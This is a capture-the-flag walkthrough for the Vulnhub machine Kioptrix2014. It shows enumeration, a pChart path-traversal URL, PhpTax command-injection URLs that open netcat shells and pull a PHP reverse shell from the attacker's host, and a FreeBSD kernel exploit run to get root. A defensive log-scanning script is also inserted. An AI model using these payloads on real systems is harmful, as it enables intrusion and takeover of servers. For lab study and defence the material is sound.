Vulnhub Kioptrix2014
Enumeration
Like always, let's start with a scan.
nmap -Pn -sS -sC -vv -T 4 -p- 192.168.1.121
Nmap scan report for kioptrix2014 (192.168.1.134)
Host is up (0.00024s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:04:AC:9C (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.24 ms kioptrix2014 (192.168.1.134)
While that was running, I decided to check if it had a website.
It did; the website contained a simple "It works!"
I looked at the source code.
<html>
<head>
<!--
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
-->
</head>
<body>
<h1>It works!</h1>
</body>
</html>
Looking at the comment, I decided to append it to the URL. It redirected us to the following URL:
http://192.168.1.134/pChart2.1.3/examples/index.php
The website contains a lot of functions to create graphs…
Dirb
I decided to run dirb to see if it finds something interesting.
dirb http://192.168.1.134/pChart2.1.3/ /usr/share/dirb/wordlists/common.txt
dirb http://192.168.1.134/ /usr/share/dirb/wordlists/common.txt
I didn't get anything particularly good: a bunch of indexable directories that didn't contain anything interesting.
Nikto
Now Nikto; let's see what it has to say.
nikto -h 192.168.1.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.134
+ Target Hostname: 192.168.1.134
+ Target Port: 80
+ Start Time: 2017-05-17 05:00:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
mod_ssl/2.2.21 seems vulnerable. I used searchsploit to look up mod_ssl.
searchsploit mod_ssl
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuckV2.c' Remote Exploit (2) | ./unix/remote/764.c
Apache/mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow | ./multiple/dos/21575.txt
Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1) | ./unix/remote/21671.c
Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit | ./unix/remote/40347.txt
Apache/mod_ssl 2.0.x - Remote Denial of Service | ./linux/dos/24590.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenFuckV2 looks promising, but after looking at the source code it seems to target Apache 1.x, not Apache 2.x.
pChart2.1.3
So I decided to searchsploit pChart.
searchsploit pChart
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities | ./php/webapps/31173.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
We got a hit. After reading the file, it looks like the web app is vulnerable to LFI.
hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
And it does work. I looked at /etc/passwd and other typical files. I had to google where the default Apache 2 install goes on BSD. We know it's a FreeBSD machine and it's using Apache 2.2.21. The location is /usr/local/etc/apache22/httpd.conf. That file contains the virtual host configuration. Near the end of the file is the interesting part.
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
It looks like we need to change our browser's User-Agent to Mozilla/4.0.
Phptax
So we have this website that looks like it's made to submit taxes. I played around with it for a few minutes and decided to searchsploit it.
searchsploit phptax
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
PhpTax - pfilez Parameter Exec Remote Code Injection | ./php/webapps/21833.rb
phptax 0.8 - Remote Code Execution | ./php/webapps/21665.txt
PhpTax 0.8 - File Manipulation (newvalue) / Remote Code Execution | ./php/webapps/25849.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
We got more vulnerable software.
So it looks like we can execute commands directly from the URL.
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
This would create a reverse TCP connection, but it will not work on this machine because its nc version does not support the -e option.
If we look at 21665.txt, we can see that it converts the file and puts it in data/pdf/. If we navigate to that page we'll see all the previous uploads.
We can maybe try to upload a PHP reverse shell.
So this one was tricky for me; it took me forever to figure out a way in.
By looking at the httpd-error.log from the previous exploit, I saw that the script is looking for a file located in the files folder.
The page is browsable and indexed, so I could see all the files it uses to create those PDF/PNG files. So I tried writing something into one of them using echo.
This would append the word YO to the end of the file located in ./files/1040d-pg1.calc, and it did. Now that I know I can write into it, I'll set up an ncat listener to transfer a file.
nc -nlv 1234 < php-reverse-shell
http://192.168.1.134:8080/phptax/index.php?pfilez=yp;nc%20192.168.1.148%201234%20%3E%3E%20./files/shell.txt.php;&pdf=make
Using that URL I managed to upload my reverse shell; the only thing left is to set up a listener and load me.txt.php.
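Both request shapes used above, the pChart traversal in the Script parameter and the PhpTax shell metacharacters in pfilez, are easy to pick out of the Apache access log. The following detector is an added example (not code from the original write-up or from either project), run over constructed log lines that mirror those requests; it URL-decodes repeatedly so double encoding cannot hide a traversal.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines (made-up IPs and timestamps) shaped like
# the pChart and PhpTax requests in this write-up; the third line is benign.
SAMPLE_LOG = """\
192.168.1.148 - - [17/May/2017:05:02:11 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1463 "-" "Mozilla/5.0"
192.168.1.148 - - [17/May/2017:05:10:42 -0400] "GET /phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.168.1.50 - - [17/May/2017:05:11:03 -0400] "GET /phptax/index.php?pfilez=1040d1-pg2.tob&pdf=make HTTP/1.1" 200 9211 "-" "Mozilla/4.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')      # a '..' path segment
SHELL_META_RE = re.compile(r'[;|&`$<>]')           # shell separators / redirection

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded %252f cannot hide '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_query(query):
    """Return (kind, parameter, decoded_value) findings for one query string."""
    findings = []
    for pair in query.split("&"):          # split manually; do not rely on parse_qs
        name, _, raw = pair.partition("=")
        value = decode_fully(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(("path_traversal", name, value))
        if SHELL_META_RE.search(value):
            findings.append(("command_injection", name, value))
    return findings

def scan_log(text):
    """Return (client_ip, method, target, findings) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, method, target, _status = m.groups()
        _path, _, query = target.partition("?")
        findings = classify_query(query)
        if findings:
            hits.append((ip, method, target, findings))
    return hits
```

Calling scan_log(SAMPLE_LOG) flags the first two lines and leaves the benign PhpTax request alone.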
Weevely the gorgeous
First thing, I'll upload a weevely shell because it's a more awesome shell than a regular reverse shell. I tried uploading it to the same location as the previous reverse shell but weevely wouldn't connect. I guess it's the browser agent that is blocking it, since I'm getting a 403 error. So using the first reverse shell I'll upload the second one.
I'll browse to /usr/local/www/apache22/data/pChart2.1.3, the location of the first website we encountered. I'll set up another ncat listener to transfer a file. I tried curl and wget and it looks like we can't use them.
On kali box
weevely generate me.php toor
nc -nlv 1234 < me.php
On kioptrix
pwd
/usr/local/www/apache22/data/pChart2.1.3
nc 192.168.1.148 1234 > me.php
On kali box
weevely http://192.168.1.134/pChart2.1.3/me.php toor
Well… Nothing seems to work. I tried transferring it to multiple places and file names and nada. I guess it's python? Let's move on then.
Enumeration
So, like always, first things first:
uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
FreeBSD 9.0
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation | ./freebsd/local/26368.c
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation | ./freebsd/local/28718.c
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
After reading both of them, I decided to try the first one, 26368.c. I used nc again to transfer it and gcc to compile it.
nc 192.168.1.148 1234 > exploit.c
gcc exploit.c
./a.out
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
Well yeah, that’s good game.
It literally took me forever to get a shell on the machine. Like FOREVER!